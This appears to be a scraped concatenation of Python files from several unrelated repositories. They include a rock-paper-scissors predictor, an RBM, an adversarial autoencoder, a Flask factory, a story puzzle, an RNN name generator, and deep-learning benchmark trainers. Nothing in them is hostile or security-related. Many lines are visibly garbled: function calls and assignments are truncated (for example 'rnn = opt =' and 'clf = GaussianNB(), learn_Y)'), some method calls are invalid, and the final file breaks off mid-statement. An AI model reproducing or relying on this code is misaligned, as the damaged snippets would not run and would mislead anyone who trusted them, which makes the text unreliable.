texts_from_metrics(selected_key, predicted_key, accuracy, window_accuracy, window_size): global int_2_char output_text1 = "Chosen - Prediction : " + int_2_char[selected_key] + " - " + int_2_char[predicted_key] output_text2 = "Overall accuracy: {:.2f}".format(accuracy) output_text3 = "Last {} guesses accuracy: {:.2f}".format(window_size, window_accuracy) output_text4 = "" if accuracy > 1 / 3: output_text4 += "Human successfully predicted by AI " else: output_text4 += "Human not successfully predicted by AI" return [output_text1, output_text2, output_text3, output_text4] def process_key_press(event): if event.char not in 'rspRSP' or len(event.char) < 1: return global case_counter, predicted_key, X_advanced, correctness_hist, learn_X, learn_Y selected_key, prediction_correct, accurate_guesses = preprocess_char(event.char) learn_X, learn_Y = step_preprocess_x_y(learn_X, learn_Y, selected_key) case_counter += 1 accuracy = accurate_guesses / case_counter correctness_hist.append(prediction_correct) window_accuracy = sum(correctness_hist[-window_size:]) / min(case_counter, window_size) X_advanced = create_next_x(learn_X, selected_key, prediction_correct) output_texts = texts_from_metrics(selected_key, predicted_key, accuracy, window_accuracy, window_size) w1 = Label(root, text=output_texts[0], anchor="w", width=300) w2 = Label(root, text=output_texts[1], anchor="w", width=300) w3 = Label(root, text=output_texts[2], anchor="w", width=300) w4 = Label(root, text=output_texts[3], anchor="w", width=300), y=10), y=30), y=50), y=70) clf.partial_fit([learn_X[-1]] * case_counter, [learn_Y[-1]] * case_counter) predicted_key = clf.predict([X_advanced])[0] allowed_symbols = 'RPS' char_2_int, int_2_char = get_id_dictionary(allowed_symbols) correctness_hist = [] window_size = 100 work_list = [char_2_int[element] for element in ','.join(random.choice(allowed_symbols) for _ in range(2 * window_size)).split(',')] learn_X = [work_list[i:i + window_size] for i in range(0, len(work_list) - window_size)] for i in range(0, len(work_list) - window_size): learn_X[i].append(random.randint(0, 1)) learn_Y = work_list[window_size:] predicted_key = char_2_int[random.choice(allowed_symbols)] X_advanced = create_next_x(learn_X, learn_Y[-1], predicted_key) correct_count, case_counter = 0, 0 clf = GaussianNB(), learn_Y) root = Tk() root.geometry('600x100') root.bind("<Key>", process_key_press) root.mainloop() ```
{ "source": "0Gemini0/generative-models", "score": 3 }
#### File: RBM/RBM_binary_cd/ ```python import numpy as np import matplotlib.pyplot as plt import matplotlib.gridspec as gridspec import os from tensorflow.examples.tutorials.mnist import input_data if not os.path.exists('out/'): os.makedirs('out/') mnist = input_data.read_data_sets('../../MNIST_data', one_hot=True) X_dim = mnist.train.images.shape[1] y_dim = mnist.train.labels.shape[1] mb_size = 16 h_dim = 36 W = np.random.randn(X_dim, h_dim) * 0.001 def sigm(x): return 1/(1 + np.exp(-x)) def infer(X): # mb_size x x_dim -> mb_size x h_dim return sigm(X @ W) def generate(H): # mb_size x h_dim -> mb_size x x_dim return sigm(H @ W.T) # Contrastive Divergence # ---------------------- # Approximate the log partition gradient Gibbs sampling alpha = 0.1 K = 10 # Num. of Gibbs sampling step for t in range(1, 101): X_mb = (mnist.train.next_batch(mb_size)[0] > 0.5).astype(np.float) g = 0 for v in X_mb: # E[h|v,W] mu = infer(v) # Gibbs sampling steps # -------------------- v_prime = np.copy(v) for k in range(K): # h ~ p(h|v,W) h_prime = np.random.binomial(n=1, p=infer(v_prime)) # v ~ p(v|h,W) v_prime = np.random.binomial(n=1, p=generate(h_prime)) # E[h|v',W] mu_prime = infer(v_prime) # Compute data gradient grad_w = np.outer(v, mu) - np.outer(v_prime, mu_prime) # Accumulate minibatch gradient g += grad_w W += (alpha/t) / mb_size * g # Visualization # ------------- def plot(samples, size, name): size = int(size) fig = plt.figure(figsize=(4, 4)) gs = gridspec.GridSpec(4, 4) gs.update(wspace=0.05, hspace=0.05) for i, sample in enumerate(samples): ax = plt.subplot(gs[i]) plt.axis('off') ax.set_xticklabels([]) ax.set_yticklabels([]) ax.set_aspect('equal') plt.imshow(sample.reshape(size, size), cmap='Greys_r') plt.savefig('out/{}.png'.format(name), bbox_inches='tight') plt.close(fig) X = (mnist.test.next_batch(mb_size)[0] > 0.5).astype(np.float) H = np.random.binomial(n=1, p=infer(X)) plot(H, np.sqrt(h_dim), 'H') X_recon = np.random.binomial(n=1, p=generate(H)) plot(X_recon, np.sqrt(X_dim), 'V') ``` #### File: VAE/adversarial_autoencoder/ ```python import torch import torch.nn import torch.nn.functional as nn import torch.autograd as autograd import torch.optim as optim import numpy as np import matplotlib.pyplot as plt import matplotlib.gridspec as gridspec import os from torch.autograd import Variable from tensorflow.examples.tutorials.mnist import input_data mnist = input_data.read_data_sets('../../MNIST_data', one_hot=True) mb_size = 32 z_dim = 5 X_dim = mnist.train.images.shape[1] y_dim = mnist.train.labels.shape[1] h_dim = 128 cnt = 0 lr = 1e-3 # Encoder Q = torch.nn.Sequential( torch.nn.Linear(X_dim, h_dim), torch.nn.ReLU(), torch.nn.Linear(h_dim, z_dim) ) # Decoder P = torch.nn.Sequential( torch.nn.Linear(z_dim, h_dim), torch.nn.ReLU(), torch.nn.Linear(h_dim, X_dim), torch.nn.Sigmoid() ) # Discriminator D = torch.nn.Sequential( torch.nn.Linear(z_dim, h_dim), torch.nn.ReLU(), torch.nn.Linear(h_dim, 1), torch.nn.Sigmoid() ) def reset_grad(): Q.zero_grad() P.zero_grad() D.zero_grad() def sample_X(size, include_y=False): X, y = mnist.train.next_batch(size) X = Variable(torch.from_numpy(X)) if include_y: y = np.argmax(y, axis=1).astype( y = Variable(torch.from_numpy(y)) return X, y return X Q_solver = optim.Adam(Q.parameters(), lr=lr) P_solver = optim.Adam(P.parameters(), lr=lr) D_solver = optim.Adam(D.parameters(), lr=lr) for it in range(1000000): X = sample_X(mb_size) """ Reconstruction phase """ z_sample = Q(X) X_sample = P(z_sample) recon_loss = nn.binary_cross_entropy(X_sample, X) recon_loss.backward() P_solver.step() Q_solver.step() reset_grad() """ Regularization phase """ # Discriminator z_real = Variable(torch.randn(mb_size, z_dim)) z_fake = Q(X) D_real = D(z_real) D_fake = D(z_fake) D_loss = -torch.mean(torch.log(D_real) + torch.log(1 - D_fake)) D_loss.backward() D_solver.step() reset_grad() # Generator z_fake = Q(X) D_fake = D(z_fake) G_loss = -torch.mean(torch.log(D_fake)) G_loss.backward() Q_solver.step() reset_grad() # Print and plot every now and then if it % 1000 == 0: print('Iter-{}; D_loss: {:.4}; G_loss: {:.4}; recon_loss: {:.4}' .format(it,[0],[0],[0])) samples = P(z_real).data.numpy()[:16] fig = plt.figure(figsize=(4, 4)) gs = gridspec.GridSpec(4, 4) gs.update(wspace=0.05, hspace=0.05) for i, sample in enumerate(samples): ax = plt.subplot(gs[i]) plt.axis('off') ax.set_xticklabels([]) ax.set_yticklabels([]) ax.set_aspect('equal') plt.imshow(sample.reshape(28, 28), cmap='Greys_r') if not os.path.exists('out/'): os.makedirs('out/') plt.savefig('out/{}.png' .format(str(cnt).zfill(3)), bbox_inches='tight') cnt += 1 plt.close(fig) ```
{ "source": "0gener/flask-shopping-list", "score": 3 }
#### File: flask-shopping-list/application/ ```python from flask import Flask from flask_restful import Api from flask_sqlalchemy import SQLAlchemy from instance.config import app_config api = Api() db = SQLAlchemy() def create_app(config): app = Flask(__name__, instance_relative_config=True) app.config.from_object(app_config[config]) db.init_app(app) api.init_app(app) return app ```
{ "source": "0gjimenez/Final_Exam001", "score": 4 }
#### File: 0gjimenez/Final_Exam001/ ```python def tell_story(): a = Bird() b = Dragon() c = Gorilla() # Generate as many other objects as you want d = Beetle() e = Chipmunk() f = Snake() g = Cobra() h = Goat() i = Sheep() j = Donkey() k = Pig() # Have objects interact # replace the replace_me_object replace_me_object = b final_phrase = return final_phrase class Animal: def __init__(self): self.phrase = "" def eat(self, other): self.phrase += str(other.phrase) def talk(self): return self.phrase class Beetle(Animal): def __init__(self): super().__init__() self.phrase = "ztrauq kcalb" class Bird(Animal): def __init__(self): super().__init__() self.phrase = "Tweet" class Dragon(Animal): def __init__(self): super().__init__() def eat(self, other): self.phrase = str(other.phrase[::-1]) def talk(self): return self.phrase[0::2] class Gorilla(Animal): def __init__(self): super().__init__() self.phrase = "123456789" def beat(self, other1, other2): self.phrase = str(other1.phrase) + " " + str(other2.phrase) class Chipmunk(Animal): def __init__(self): super().__init__() self.phrase = "Munchd" def eat(self,other): self.phrase = str(other.phrase[0]) class Snake(Animal): def __init__(self): super().__init__() self.phrase = "Hiss" def eat(self,other): self.phrase = str(other.phrase).toLower() class Cobra(Animal): def __init__(self): super().__init__() self.phrase = "Snorflek" def eat(self,other): self.phrase = str(other.phrase).toUpper() class Goat(Animal): def __init__(self): super().__init__() self.phrase = "Brae" def eat(self,other): self.phrase = str(other.phrase)+str(",") class Sheep(Animal): def __init__(self): super().__init__() self.phrase = "GypJ" class Donkey(Animal): def __init__(self): super().__init__() self.phrase = "vozx" def eat(self,other): self.phrase = str(other.phrase)+str("!") class Pig(Animal): def __init__(self): super().__init__() self.phrase ="eduj" if __name__ == "__main__": print(tell_story()=="Sphinx of black quartz, judge my vow!") ```
{ "source": "0HenryH/ai2021s", "score": 3 }
#### File: ai2021s/AI-lec8-rnn/ ```python import time import numpy as np import pandas as pd import torch import torch.nn as nn import itertools import collections import matplotlib.pyplot as plt # Read in data # df = pd.read_csv("Chinese_Names_Corpus_Gender(120W).txt", header=2) df = pd.read_csv("English_Cn_Name_Corpus(48W).txt", header=None, names=["name"], skiprows=2) names = df["name"].values # Compute character frequency chars = [list(name) for name in names] chars_flatten = list(itertools.chain(*chars)) freq = collections.Counter(chars_flatten) freq = pd.DataFrame(freq.items(), columns=["char", "freq"]) freq = freq.sort_values(by="freq", ascending=False) # Power law (?) char_rank = np.arange(freq.shape[0]) char_freq = freq["freq"].values plt.plot(char_rank, char_freq) plt.plot(np.log(1.0 + char_rank), np.log(char_freq)) # Prepare data dict_size = 50 charset_size = dict_size + 1 # for EOS dict = list(freq["char"].values[:dict_size]) dict_set = set(dict) dat = list(filter(lambda name: set(name).issubset(dict_set), names)) # One-hot encoding def char2index(char): return dict.index(char) def name2index(name): return [char2index(char) for char in name] def char2tensor(char): tensor = torch.zeros(1, charset_size) tensor[0, char2index(char)] = 1 return tensor def name2tensor(name): tensor = torch.zeros(len(name), 1, charset_size) for i, char in enumerate(name): tensor[i, 0, char2index(char)] = 1 return tensor def names2tensor(names): n = len(names) lens = [len(name) for name in names] max_len = np.max(lens) tensor = torch.zeros(max_len, n, charset_size) target = torch.zeros(max_len, n, dtype=int) + charset_size - 1 for i in range(n): name = names[i] # the i-th name for j in range(len(name)): # the j-th character in the name tensor[j, i, char2index(name[j])] = 1 if j < len(name) - 1: target[j, i] = char2index(name[j + 1]) return tensor, np.array(lens), target char2index("斯") name2index("斯基") char2tensor("斯") name2tensor("斯基") names2tensor(["斯基", "斯诺夫"]) # Build model class RNN(nn.Module): def __init__(self, input_size, hidden_size): super(RNN, self).__init__() self.hidden_size = hidden_size self.i2h = nn.Linear(input_size + hidden_size, hidden_size) self.i2o = nn.Linear(input_size + hidden_size, input_size) self.o2o = nn.Linear(hidden_size + input_size, input_size) self.dropout = nn.Dropout(0.1) self.logsoftmax = nn.LogSoftmax(dim=1) def forward(self, input, hidden): input_combined =, hidden), 1) hidden = torch.relu(self.i2h(input_combined)) output = torch.relu(self.i2o(input_combined)) output_combined =, output), 1) output = self.o2o(output_combined) output = self.dropout(output) output = self.logsoftmax(output) return output, hidden def init_hidden(self, batch_size): return torch.zeros(batch_size, self.hidden_size) n_hidden = 64 rnn = RNN(charset_size, n_hidden) input = name2tensor("斯基") hidden = rnn.init_hidden(batch_size=1) output, next_hidden = rnn(input[0], hidden) np.random.seed(123) torch.random.manual_seed(123) device = torch.device("cuda") # device = torch.device("cpu") # If no GPU on the machine # train_id = np.random.choice(len(dat), 10000) # train = [dat[i] for i in train_id] train = dat n = len(train) n_hidden = 256 nepoch = 100 bs = 256 rnn = RNN(charset_size, n_hidden) rnn = opt = torch.optim.Adam(rnn.parameters(), lr=0.001) train_ind = np.arange(n) lossfn = nn.NLLLoss(reduction="none") losses = [] t1 = time.time() for k in range(nepoch): np.random.shuffle(train_ind) # Update on mini-batches for j in range(0, n, bs): # Create mini-batch ind = train_ind[j:(j + bs)] mb = [train[i] for i in ind] mb_size = len(mb) input, actual_len, target = names2tensor(mb) input = target = max_len = input.shape[0] hidden = rnn.init_hidden(mb_size).to(device=device) loss = 0.0 for s in range(max_len): output, hidden = rnn(input[s], hidden) loss_s = lossfn(output, target[s]) valid = torch.tensor((s < actual_len).astype(int)).to(device=device) loss = loss + loss_s * valid loss = torch.mean(loss / torch.tensor(actual_len).to(device=device)) opt.zero_grad() loss.backward() opt.step() losses.append(loss.item()) if j // bs % 10 == 0: print(f"epoch {k}, batch {j // bs}, loss = {loss.item()}") t2 = time.time() print(t2 - t1) plt.plot(losses) #, "") # rnn.load_state_dict(torch.load("")) # rnn.eval() family_names = np.unique([name[0] for name in dat]) def random_family_name(): return np.random.choice(family_names, 1)[0] def random_name(max_len=4): rnn.eval() family_name = random_family_name() input = char2tensor(family_name).to(device=device) char_ind = [torch.argmax(input).item()] hidden = rnn.init_hidden(batch_size=1).to(device=device) for i in range(max_len - 1): output, hidden = rnn(input, hidden) ind = torch.argmax(output).item() if ind == charset_size - 1: break char_ind.append(ind) input.zero_() input[0, ind] = 1.0 return char_ind np.random.seed(123) torch.random.manual_seed(123) ind = random_name(10) print("".join([dict[i] for i in ind])) np.random.seed(123) torch.random.manual_seed(123) names = [] for i in range(50): ind = random_name(10) names.append("".join([dict[i] for i in ind])) np.set_printoptions(linewidth=50) print(np.array(names)) ```
{ "source": "0h-n0/DL_benchmarks", "score": 2 }
#### File: DL_benchmarks/benchmark/ ```python import json from pathlib import Path from importlib import import_module import numpy as np from tqdm import tqdm from sacred import Experiment from sacred.observers import FileStorageObserver import torchvision.datasets from import Iterator ex = Experiment('benchmark') project_root = Path(__file__).resolve().parent.parent data_dir = project_root / 'results' ex.observers.append(FileStorageObserver.create(str(data_dir))) @ex.config def config(): """ """ project_root = str(project_root) ngpu = 1 # ngpu = 0 corresponds to cpu-mode data_type = 'image' # You can choise data-type from this list ['image', 'sequence', 'mnist', 'cifer-10']. 'image' and 'sequence' are dummy data. assert data_type in ['image', 'sequence', 'mnist', 'cifer-10'], \ "Your data_type[{}] is not supported.".format(data_type) batch_size = 128 image_shape = (3, 28, 28) progressbar = True framework = 'torch' dnn_arch = 'CNN' opt_type = 'SGD' opt_conf = dict( lr = 0.01, momentum = 0.9 ) trainer_options = dict( mode='train', benchmark_mode=True, half=False, parallel_loss=True, ) time_options = 'total' assert time_options in ['total', 'forward', 'backward'], \ "Your time_options[{}] is not supported.\n".format(dnn_arch) assert dnn_arch.lower() in ['cnn', 'dnn', 'rnn', 'lstm', 'capsnet' 'blstm', 'gru', 'alexnet', 'resnet', 'vgg16'], \ "Your dnn_arch[{}] is not supported.\n".format(dnn_arch) if dnn_arch.lower() in ['resnet']: batch_size = 92 image_shape = (3, 200, 200) data_options = dict( image_shape = image_shape, # (channel, witdth, height) sequence_shape = 28, # feature niteration = 1000, batch_size = batch_size, label_size = 3000, target_type = None, random_generation = False, # If this flag is False, iterator returns same array in all iterations. ) rnn_layers = 4 framework_version = None assert framework in ['torch', 'mxnet', 'chainer', 'caffe2', 'cntk', 'tensorflow', 'dynet', 'nnabla', 'neon'], \ "Your framework[{}] is not supported.\n".format(framework) @ex.capture def get_iterator(framework, data_type, data_options, progressbar): dtype = data_type.lower() if dtype == 'mnist': from torchvision import datasets # check data. train_iter = datasets.MNIST('../data', train=True, download=True, transform=transforms.Compose([ transforms.Normalize((0.1307,), (0.3081,)) ])) test_iter = datasets.MNIST('../data', train=False, download=True, transform=transforms.Compose([ transforms.Normalize((0.1307,), (0.3081,)) ])) elif dtype == 'image': if framework == 'tensorflow': data_options['target_type'] = 'one-hot' train_iter = Iterator(data_type, **data_options) test_iter = None if progressbar: train_iter = tqdm(train_iter) if test_iter: test_iter = tqdm(test_iter) return train_iter, test_iter @ex.capture def get_model(module, data_type, data_options, dnn_arch, rnn_layers, ngpu): dtype = data_type.lower() if dtype == 'image': channel, xdim, ydim = data_options['image_shape'] output_num = data_options['label_size'] gpu_mode = True if ngpu >= 1 else False if dnn_arch.lower() == 'cnn': model = module.CNN(channel, xdim, ydim, output_num) if dnn_arch.lower() == 'resnet': model = module.ResNet(channel, xdim, ydim, output_num) elif dtype == 'mnist': channel, xdim, ydim = 1, 28, 28 output_num = 10 gpu_mode = True if ngpu >= 1 else False if dnn_arch == 'CNN': model = module.CNN(channel, xdim, ydim, output_num) elif dtype == 'cifer-10': pass elif dtype == "sequence": pass return model @ex.capture def _get_trainer(module, model, ngpu, trainer_options, data_options, time_options): trainer = module.Trainer(model, ngpu, trainer_options, data_options, time_options) return trainer @ex.capture def get_trainer(_config, framework, framework_version, ngpu): model = None if framework == 'torch': module = import_module('') model = get_model(module=module) trainer = _get_trainer(module=module, model=model) elif framework == 'mxnet': module = import_module('') model = get_model(module=module) trainer = _get_trainer(module=module, model=model) elif framework == 'chainer': module = import_module('') model = get_model(module=module) trainer = _get_trainer(module=module, model=model) elif framework == 'cntk': module = import_module('benchmark.models.ct') model = get_model(module=module) trainer = _get_trainer(module=module, model=model) elif framework == 'tensorflow': module = import_module('') model = get_model(module=module) trainer = _get_trainer(module=module, model=model) elif framework == 'neon': module = import_module('') model = get_model(module=module) trainer = _get_trainer(module=module, model=model) else: raise ValueError return trainer @ex.capture def train(trainer, train_iter, test_iter, opt_type, opt_conf): np.random.seed(1) trainer.set_optimizer(opt_type, opt_conf) results =, test_iter) dump_results(results=results) @ex.command def setup(): pass @ex.capture def dump_config(_config, _run): exp_dir = data_dir / str(_run._id) config_file = exp_dir / "config.json" with'w') as fp: json.dump(_config, fp, indent=4) @ex.capture def dump_results(_config, _run, results): exp_dir = data_dir / str(_run._id) config_file = exp_dir / "results.json" with'w') as fp: json.dump(results, fp, indent=4) @ex.automain def main(_run, _config, project_root, framework): train_iter, test_iter = get_iterator() trainer = get_trainer() train(trainer=trainer, train_iter=train_iter, test_iter=test_iter) dump_config() ``` #### File: benchmark/models/ ```python import time import copy import torch import numpy as np from tqdm import tqdm import chainer from chainer import Chain import chainer.links as L import chainer.functions as F from chainer.function_hooks import TimerHook from benchmark.models.base_trainer import BaseTrainer class Trainer(BaseTrainer): def __init__(self, model, ngpu, options, data_options=None, time_options=None): self.ngpu = ngpu self.gpu_mode = True if ngpu >= 1 else False self.time_options = time_options if self.gpu_mode: self.model = [copy.deepcopy(model).to_gpu(i) for i in range(ngpu)] else: self.model = model if options['benchmark_mode']: chainer.using_config('autotune', True) def set_optimizer(self, opt_type, opt_conf): if opt_type == 'SGD': self.optimizer = chainer.optimizers.SGD(lr=opt_conf['lr']) self.optimizer.setup(self.model[0]) elif opt_type == 'MomentumSGD': self.optimizer = chainer.optimizers.MomentumSGD(lr=opt_conf['lr'], momentum=opt_conf['momentum']) self.optimizer.setup(self.model[0]) elif opt_type == 'Adam': self.optimizer = chainer.optimizers.Adam(lr=opt_conf['lr']) self.optimizer.setup(self.model[0]) else: raise NotImplementedError self.optimizer.use_cleargrads() def run(self, iterator, mode='train'): report = dict() time_series = [] start_event = torch.cuda.Event(enable_timing=True) end_event = torch.cuda.Event(enable_timing=True) total_s = time.perf_counter() for idx, (x, t) in enumerate(iterator): if self.time_options == 'total': start_event.record() if self.gpu_mode: x = x.astype(np.float32) t = t.astype(np.int32) minibatch = len(x) // self.ngpu x = [chainer.Variable( chainer.cuda.to_gpu(x[j*minibatch:(j+1)*minibatch], j)) for j in range(self.ngpu)] t = [chainer.Variable( chainer.cuda.to_gpu(t[j*minibatch:(j+1)*minibatch], j)) for j in range(self.ngpu)] else: x = chainer.Variable(x.astype(np.float32)) t = chainer.Variable(t.astype(np.int64)) if self.time_options == 'forward': with self._record(start_event, end_event): o = [_model(_x) for _model, _x in zip(self.model, x)] else: o = [_model(_x) for _model, _x in zip(self.model, x)] loss = [F.softmax_cross_entropy(_o, _t) for _o, _t in zip(o, t)] [_model.cleargrads() for _model in self.model] if self.time_options == 'backward': with self._record(start_event, end_event): [(_loss / self.ngpu).backward() for _model, _loss in zip(self.model, loss)] else: [(_loss / self.ngpu).backward() for _model, _loss in zip(self.model, loss)] [self.model[0].addgrads(_model) for _model in self.model] self.optimizer.update() [_model.copyparams(self.model[0]) for _model in self.model] if self.time_options == 'total': end_event.record() torch.cuda.synchronize() self._elapsed_time = start_event.elapsed_time(end_event)/1000 if isinstance(iterator, tqdm): iterator.set_description('{:>10s} :{:10.7f}s/it'.format(self.time_options, self._elapsed_time)) time_series.append(self._elapsed_time) torch.cuda.synchronize() total_e = time.perf_counter() report = dict( time_series=time_series, total=total_e - total_s, ) return report class Convblock(Chain): def __init__(self, in_ch, out_ch, kernel, stride=1, pooling=False): self.pooling = pooling super(Convblock, self).__init__() with self.init_scope(): self.conv = L.Convolution2D(in_ch, out_ch, kernel, stride=stride) def __call__(self, x): if self.pooling: return F.max_pooling_2d(F.relu(self.conv(x)), (1, 2), stride=2) else: return F.relu(self.conv(x)) class CNN(Chain): def __init__(self, channel, xdim, ydim, output_num): super(CNN, self).__init__() with self.init_scope(): self.conv1 = Convblock(channel, 180, (xdim, 3), 1) self.conv2 = Convblock(180, 180, (1, 3), stride=1, pooling=True) self.conv3 = Convblock(180, 180, (1, 3), stride=1) self.conv4 = Convblock(180, 180, (1, 3), stride=1, pooling=True) self.conv5 = Convblock(180, 180, (1, 2), stride=1) self.conv6 = Convblock(180, 180, (1, 1), stride=1) self.l1 = L.Linear(540, 2048) self.l2 = L.Linear(2048, 2048) self.l3 = L.Linear(2048, output_num) def __call__(self, x): h = self.conv1(x) h = self.conv2(h) h = self.conv3(h) h = self.conv4(h) h = self.conv5(h) h = self.conv6(h) h = self.l1(h) h = self.l2(h) h = self.l3(h) return h ``` #### File: benchmark/models/ ```python import os import numpy as np import cntk as C from cntk.device import try_set_default_device, gpu, all_devices from ctmodel import cnn from import MinibatchSource, CTFDeserializer, StreamDef, StreamDefs, INFINITELY_REPEAT from cntk.initializer import he_normal from cntk.layers import AveragePooling, BatchNormalization, Convolution, Dense from cntk.ops import element_times, relu class Trainer(object): def __init__(self, model, ngpu, options=None): self.model = model self.ngpu = ngpu self.gpu_mode = True if ngpu >= 1 else False if self.gpu_mode: gpus = [i for i in range(self.ngpu)] self.is_parallel = False if options: self.progressbar = options['progressbar'] def set_optimizer(self, opt_type, opt_conf): if opt_type == 'SGD': self.lr_schedule = C.learning_rate_schedule( opt_conf['lr'], C.UnitType.minibatch) self.m_schedule = C.momentum_schedule( opt_conf['momentum'], C.UnitType.minibatch) else: raise NotImplementedError def run(self, iterator, mode='train'): report = dict() input_var = C.ops.input_variable(, np.float32) label_var = C.ops.input_variable(iterator.batch_size, np.float32) model = self.model(input_var,) ce = C.losses.cross_entropy_with_softmax(model, label_var) pe = C.metrics.classification_error(model, label_var) z = cnn(input_var) learner = C.learners.momentum_sgd(z.parameters, self.lr_schedule, self.m_schedule) if self.is_parallel: distributed_learner = \ C.data_parallel_distributed_learner(learner=learner, distributed_after=0) progress_printer = \ C.logging.ProgressPrinter(tag='Training', num_epochs=iterator.niteration) if self.is_parallel: trainer = C.Trainer(z, (ce, pe), distributed_learner, progress_printer) else: trainer = C.Trainer(z, (ce, pe), learner, progress_printer) for idx, (x, t) in enumerate(iterator): total_s = time.perf_counter() trainer.train_minibatch({input_var : x, label_var : t}) forward_s = time.perf_counter() forward_e = time.perf_counter() backward_s = time.perf_counter() backward_e = time.perf_counter() total_e = time.perf_counter() report[idx] = dict( forward=forward_e - forward_s, backward=backward_e - backward_s, total=total_e - total_s ) return report class CNN(object): def __init__(self, channel, xdim, ydim, output_num): self.cnn = partial(cnn, channel=channel, xdim=xdim, ydim=ydim, output_num=output_num) def get_func(self): return self.cnn def __call__(self, x): return self.cnn(x) def cnn(x, channel, xdim, ydim, output_num): net = C.layers.Convolution2D((xdim, 3), 180, activation=C.ops.relu, pad=False, strides=1)(x) net = C.layers.Convolution2D((1, 3), 180, activation=C.ops.relu, pad=False)(net) net = C.layers.MaxPooling((1, 2), strides=2)(net) net = C.layers.Convolution2D((1, 3), 180, activation=C.ops.relu, pad=False)(net) net = C.layers.Convolution2D((1, 3), 180, activation=C.ops.relu, pad=False)(net) net = C.layers.MaxPooling((1, 2), strides=2)(net) net = C.layers.Convolution2D((1, 2), 180, activation=C.ops.relu, pad=False)(net) net = C.layers.Convolution2D((1, 1), 180, activation=C.ops.relu, pad=False)(net) net = C.layers.Dense(2048)(net) net = C.layers.Dense(2048)(net) net = C.layers.Dense(output_num, activation=None)(net) return net ``` #### File: benchmark/models/ ```python import os import time from functools import partial # import neon as nn class Trainer(object): def __init__(self, model, ngpu, options=None): self.model = model self.ngpu = ngpu self.gpu_mode = True if ngpu >= 1 else False if self.gpu_mode: self.gpus = [mx.gpu(i) for i in range(ngpu)] if options['benchmark_mode']: os.environ['MXNET_CUDNN_AUTOTUNE_DEFAULT'] = '1' self.progressbar = options['progressbar'] def set_optimizer(self, opt_type, opt_conf): if opt_type == 'SGD': self.opt_type = 'sgd' = opt_conf['lr'] self.metric = mx.metric.CrossEntropy() else: raise NotImplementedError def run(self, iterator, mode='train'): report = dict() # setup mxnet module data = mx.sym.var('data') module = mx.mod.Module(symbol=self.model(data), context=self.gpus, data_names=['data'], label_names=['softmax_label']) B = iterator.batch_size C, H, W = iterator.image_shape data_shape = (B, C, H, W) label_shape = (B,) # module.bind(data_shapes=zip(['data'], [data_shape]), label_shapes=zip(['softmax_label'], [label_shape])) module.init_params(initializer=mx.init.Xavier(magnitude=2.)) module.init_optimizer(optimizer=self.opt_type, optimizer_params=(('learning_rate',,)) self.metric.reset() ## end setup if self.progressbar: iterator = tqdm(iterator) for idx, (x, t) in enumerate(iterator): total_s = time.perf_counter() x = [mx.nd.array(x[i, ...].reshape(1, C, H, W)) for i in range(B)] t = [mx.nd.array([t[i]]) for i in range(B)] batch =, t) forward_s = time.perf_counter() module.forward(batch, is_train=True) forward_e = time.perf_counter() module.update_metric(self.metric, batch.label) backward_s = time.perf_counter() module.backward() backward_e = time.perf_counter() module.update() total_e = time.perf_counter() report[idx] = dict( forward=forward_e - forward_s, backward=backward_e - backward_s, total=total_e - total_s ) return report class CNN(object): def __init__(self, channel, xdim, ydim, output_num): self.cnn = partial(cnn, channel=channel, xdim=xdim, ydim=ydim, output_num=output_num) def get_func(self): return self.cnn def __call__(self, x): return self.cnn(x) def cnn(x, channel, xdim, ydim, output_num): net = mx.sym.Convolution(data=x, kernel=(xdim, 3), num_filter=180) net = mx.sym.Activation(data=net, act_type='relu') net = mx.sym.Convolution(data=net, kernel=(1, 3), num_filter=180) net = mx.sym.Activation(data=net, act_type='relu') net = mx.sym.Pooling(data=net, pool_type='max', kernel=(1, 2), stride=(2, 2)) net = mx.sym.Convolution(data=net, kernel=(1, 3), num_filter=180) net = mx.sym.Activation(data=net, act_type='relu') net = mx.sym.Convolution(data=net, kernel=(1, 3), num_filter=180) net = mx.sym.Activation(data=net, act_type='relu') net = mx.sym.Pooling(data=net, pool_type='max', kernel=(1, 2), stride=(2, 2)) net = mx.sym.Convolution(data=net, kernel=(1, 2), num_filter=180) net = mx.sym.Activation(data=net, act_type='relu') net = mx.sym.Convolution(data=net, kernel=(1, 1), num_filter=180) net = mx.sym.Activation(data=net, act_type='relu') net = mx.sym.flatten(data=net) net = mx.sym.FullyConnected(data=net, num_hidden=2048) net = mx.sym.Activation(data=net, act_type='relu') net = mx.sym.FullyConnected(data=net, num_hidden=2048) net = mx.sym.Activation(data=net, act_type='relu') net = mx.sym.FullyConnected(data=net, num_hidden=output_num) net = mx.sym.SoftmaxOutput(data=net, name='softmax') #a = mx.viz.plot_network(net) #a.render('') return net ```
{ "source": "0h-n0/first_deep", "score": 2 }
#### File: first_deep/libs/ ```python import math from pathlib import Path import from import Dataset from import Sampler from .reserved_tokens import UNKNOWN_TOKEN from .reserved_tokens import EOS_TOKEN from .encoders import IdentityEncoder class BPTTSampler(Sampler): def __init__(self, data, bptt_length, type_='source'): = data self.bptt_length = bptt_length self.type = type_ def __iter__(self): for i in range(0, len( - 1, self.bptt_length): seq_length = min(self.bptt_length, len( - 1 - i) if self.type == 'source': yield slice(i, i + seq_length) if self.type == 'target': yield slice(i + 1, i + 1 + seq_length) def __len__(self): return math.ceil((len( - 1) / self.bptt_length) class BPTTBatchSampler(object): def __init__(self, data, bptt_length, batch_size, drop_last, type_='source'): = data self.batch_size = batch_size self.drop_last = drop_last chunk_sizes = [math.floor(len(data) / batch_size)] * batch_size # Distribute the remaining elements to some chunks if not self.drop_last: remainder = len(data) - sum(chunk_sizes) for i in range(remainder): chunk_sizes[i] += 1 self.samplers = [{ 'offset': sum(chunk_sizes[:i]), 'sampler': BPTTSampler(range(chunk_sizes[i]), bptt_length, type_=type_) } for i in range(batch_size)] def __iter__(self): self.iterators = [iter(value['sampler']) for value in self.samplers] while True: batch = [] for i, iterator in enumerate(self.iterators): try: # Adjust the sampler indices to the offset offset = self.samplers[i]['offset'] slice_ = next(iterator) batch.append(slice(slice_.start + offset, slice_.stop + offset)) except StopIteration: pass # Samplers are all empty if (len(batch) == 0): break yield batch def __len__(self): return len(self.samplers[0]['sampler']) class DummyDataset(Dataset): def __init__(self, data_source, source_sampler, target_sampler): self.data_source = data_source self.source_sampler = list(source_sampler) self.target_sampler = list(target_sampler) self.size = len(self.source_sampler) def __getitem__(self, idx): data = torch.stack([self.data_source[i] for i in self.source_sampler[idx]]) targets = torch.stack([self.data_source[i] for i in self.target_sampler[idx]]).view(-1) return data, targets def __len__(self): return self.size class PTBDataloaderFactory(object): train_data_path = '' train_test_path = '' train_valid_path = '' @classmethod def set_train_data_path(cls, path): cls.train_data_path = path @classmethod def set_test_data_path(cls, path): cls.test_data_path = 